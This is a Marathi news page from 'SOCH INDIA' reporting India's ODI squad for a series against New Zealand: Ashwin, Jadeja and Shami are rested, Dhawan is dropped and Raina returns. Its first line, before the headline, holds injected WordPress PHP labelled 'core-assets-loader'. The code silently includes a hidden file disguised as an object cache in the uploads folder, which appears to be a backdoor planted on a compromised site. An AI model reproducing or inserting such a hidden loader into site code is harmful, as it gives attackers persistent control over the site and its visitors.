add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अश्विन, जाडेजाला विश्रांती, वन डे टीममधून धवनला वगळलं – SOCH INDIA
Menu

खेल
अश्विन, जाडेजाला विश्रांती, वन डे टीममधून धवनला वगळलं

nobanner

न्यूझीलंडविरुद्धच्या वन डे मालिकेसाठी 15 सदस्यीय भारतीय संघाची घोषणा झाली आहे. वन डे मालिकेतून आर अश्विन, रवींद्र जाडेजा आणि  मोहम्मद शमी यांना विश्रांती देण्यात आली आहे. तर आऊट ऑफ फॉर्म असलेल्या शिखर धवनला संघातून वगळण्यात आलं.

महाराष्ट्राच्या केदार जाधवला संघात स्थान देण्यात आलं आहे. विशेष म्हणजे सुरेश रैनानं भारताच्या संघात कमबॅक केलं.

ऑस्ट्रेलियात दमदार कामगिरी करणाऱ्या मनिष पांडेला भारतीय संघात स्थान देण्यात आलं आहे. तर जयंत यादव आणि मनदीप सिंग या नव्या चेहऱ्यांचाही संघात समावेश करण्यात आला आहे.

16 ऑक्टोबरपासून वन डे मालिकेला सुरुवात होत आहे. यानंतर 20, 23, 26 आणि 29 ऑक्टोबरला वन डे सामने खेळवण्यात येतील.